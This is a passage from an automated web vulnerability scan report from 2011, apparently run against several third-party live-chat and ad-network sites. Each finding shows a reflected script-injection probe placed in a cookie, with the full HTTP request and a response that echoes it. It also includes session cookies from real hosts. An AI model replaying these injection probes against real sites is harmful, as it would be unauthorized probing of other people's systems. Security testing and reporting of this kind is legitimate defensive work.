<div style="BACKGROUND: #f8ebeb; FONT: 13px Trebuchet MS, Verdana, Helvetica, Arial; BORDER: 1px SOLID #751616; PADDING: 10px; MARGIN: 5px;"><font color="red">[Notice]: unserialize(): Error at offset
...[SNIP]...
</div>
UNSERIALIZE FAILED: 744c0<script>alert(1)</script>f57df5bbdeaGIF89a.............!.......,............o..;

2.207. http://edge.helpserve.com/visitor/index.php [SWIFT_visitorsession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.helpserve.com
Path:   /visitor/index.php

Issue detail

The value of the SWIFT_visitorsession cookie is copied into the HTML document as plain text between tags. The payload 90ca2<script>alert(1)</script>219f5bc8d65 was submitted in the SWIFT_visitorsession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /visitor/index.php?/LiveChat/VisitorUpdate/UpdateFootprint/_time=1317389212781/_randomNumber=53/_url=http%3A%2F%2Fwww.edgetechcorp.com%2F/_isFirstTime=1/_sessionID=1m1ygp96g458yq0vae6u9qt0dphilrkf/_referrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D3%26c2%3D302/_resolution=1920x1156/_colorDepth=16/_platform=Win32/_appVersion=5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.186%20Safari%2F535.1/_appName=Netscape/_browserCode=CH/_browserVersion=1/_browserName=Google%20Chrome/_operatingSys=Windows/_pageTitle=Memory%20Upgrades%2C%20Portable%20Hard%20Drives%2C%20Flash%20Cards%2C%20%20%20Flash%20Drives%20from%20EDGE%20Tech%20Corp/_hasNotes=0/_repeatVisit=1/_lastVisitTimeline=0/_lastChatTimeline=0/_isNewSession=1 HTTP/1.1
Host: edge.helpserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.edgetechcorp.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=1m1ygp96g458yq0vae6u9qt0dphilrkf; SWIFT_visitor=a%3A4%3A%7Bs%3A5%3A%22geoip%22%3Bi%3A1%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22sessionid%22%3Bs%3A32%3A%221m1ygp96g458yq0vae6u9qt0dphilrkf%22%3Bs%3A9%3A%22lastvisit%22%3Bi%3A1317389211%3B%7D; SWIFT_visitorsession=90ca2<script>alert(1)</script>219f5bc8d65

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: image/gif
X-Powered-By: PHP/5.3.6
Set-Cookie: SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 30 Sep 2011 13:27:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Cacheable: NO: !beresp.cacheable
Content-Length: 360
Date: Fri, 30 Sep 2011 13:27:20 GMT
X-Varnish: 1026342401
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: standalonehosted8.kayako.net
X-Cache: MISS

<div style="BACKGROUND: #f8ebeb; FONT: 13px Trebuchet MS, Verdana, Helvetica, Arial; BORDER: 1px SOLID #751616; PADDING: 10px; MARGIN: 5px;"><font color="red">[Notice]: unserialize(): Error at offset
...[SNIP]...
</div>
UNSERIALIZE FAILED: 90ca2<script>alert(1)</script>219f5bc8d65GIF89a.............!.......,............o..;

2.208. http://support.tophost.gr/visitor/index.php [SWIFT_client cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.tophost.gr
Path:   /visitor/index.php

Issue detail

The value of the SWIFT_client cookie is copied into the HTML document as plain text between tags. The payload d4189<script>alert(1)</script>85fc475e068 was submitted in the SWIFT_client cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /visitor/index.php?/LiveChat/VisitorUpdate/UpdateFootprint/_time=1317389314448/_randomNumber=35/_url=http%3A%2F%2Fwww.tophost.gr%2F/_isFirstTime=1/_sessionID=1lrdido0aqzc4egac29k1f7ntm5pxfzk/_referrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D6%26c2%3D58/_resolution=1920x1156/_colorDepth=16/_platform=Win32/_appVersion=5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.186%20Safari%2F535.1/_appName=Netscape/_browserCode=CH/_browserVersion=1/_browserName=Google%20Chrome/_operatingSys=Windows/_pageTitle=Web%20Hosting%20Greece%20%20%20Domain%20Name%20%20%20Business%20Web%20Hosting%20%20%20Dedicated%20Servers/_hasNotes=0/_repeatVisit=1/_lastVisitTimeline=0/_lastChatTimeline=0/_isNewSession=1 HTTP/1.1
Host: support.tophost.gr
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.tophost.gr/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSda4fc1e55756187736993a43da8865c4=2i7gtkul0gi6t6ljm4o3u4mor2; SWIFT_client=d4189<script>alert(1)</script>85fc475e068; SWIFT_sessionid80=1lrdido0aqzc4egac29k1f7ntm5pxfzk; SWIFT_visitor=a%3A4%3A%7Bs%3A5%3A%22geoip%22%3Bi%3A1%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22sessionid%22%3Bs%3A32%3A%221lrdido0aqzc4egac29k1f7ntm5pxfzk%22%3Bs%3A9%3A%22lastvisit%22%3Bi%3A1317389425%3B%7D; SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:30:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Sat, 29-Sep-2012 13:30:59 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 30 Sep 2011 13:30:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 419
Content-Type: image/gif

<div style="BACKGROUND: #f8ebeb; FONT: 13px Trebuchet MS, Verdana, Helvetica, Arial; BORDER: 1px SOLID #751616; PADDING: 10px; MARGIN: 5px;"><font color="red">[Notice]: unserialize() [<a href='functio
...[SNIP]...
</div>
UNSERIALIZE FAILED: d4189<script>alert(1)</script>85fc475e068GIF89a.............!.......,............o..;

2.209. http://support.tophost.gr/visitor/index.php [SWIFT_visitorsession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.tophost.gr
Path:   /visitor/index.php

Issue detail

The value of the SWIFT_visitorsession cookie is copied into the HTML document as plain text between tags. The payload 38275<script>alert(1)</script>7dce98245de was submitted in the SWIFT_visitorsession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /visitor/index.php?/LiveChat/VisitorUpdate/UpdateFootprint/_time=1317389314448/_randomNumber=35/_url=http%3A%2F%2Fwww.tophost.gr%2F/_isFirstTime=1/_sessionID=1lrdido0aqzc4egac29k1f7ntm5pxfzk/_referrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D6%26c2%3D58/_resolution=1920x1156/_colorDepth=16/_platform=Win32/_appVersion=5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.186%20Safari%2F535.1/_appName=Netscape/_browserCode=CH/_browserVersion=1/_browserName=Google%20Chrome/_operatingSys=Windows/_pageTitle=Web%20Hosting%20Greece%20%20%20Domain%20Name%20%20%20Business%20Web%20Hosting%20%20%20Dedicated%20Servers/_hasNotes=0/_repeatVisit=1/_lastVisitTimeline=0/_lastChatTimeline=0/_isNewSession=1 HTTP/1.1
Host: support.tophost.gr
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.tophost.gr/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSda4fc1e55756187736993a43da8865c4=2i7gtkul0gi6t6ljm4o3u4mor2; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=1lrdido0aqzc4egac29k1f7ntm5pxfzk; SWIFT_visitor=a%3A4%3A%7Bs%3A5%3A%22geoip%22%3Bi%3A1%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22sessionid%22%3Bs%3A32%3A%221lrdido0aqzc4egac29k1f7ntm5pxfzk%22%3Bs%3A9%3A%22lastvisit%22%3Bi%3A1317389425%3B%7D; SWIFT_visitorsession=38275<script>alert(1)</script>7dce98245de

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:31:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 30 Sep 2011 13:31:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 419
Content-Type: image/gif

<div style="BACKGROUND: #f8ebeb; FONT: 13px Trebuchet MS, Verdana, Helvetica, Arial; BORDER: 1px SOLID #751616; PADDING: 10px; MARGIN: 5px;"><font color="red">[Notice]: unserialize() [<a href='functio
...[SNIP]...
</div>
UNSERIALIZE FAILED: 38275<script>alert(1)</script>7dce98245deGIF89a.............!.......,............o..;

2.210. http:///iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Issue detail

The value of the AA002 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ecc"><a>37285dc5200 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.premiumecigarette.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750a8ecc"><a>37285dc5200; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:12:10 GMT
Connection: close
Content-Length: 462

<html><body><img src="http://spe..com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-3398750a8ecc"><a>37285dc5200%7cMUID%3d24380e08837168830d350c758071688a%7cTOptOut%3d1%7cEANON%3dA%253d0193022cOU_9I2omafYKVfAdiwwHAFTozOYd0Qqkl480QNxsC-MWA6YrhJ81bcyO7HsXe7PPDCAJZe-t1_8dGq1780v61%2526E%253dFFF%2526W%253d1%22);" wi
...[SNIP]...

Report generated by dork at Fri Sep 30 08:36:11 CDT 2011.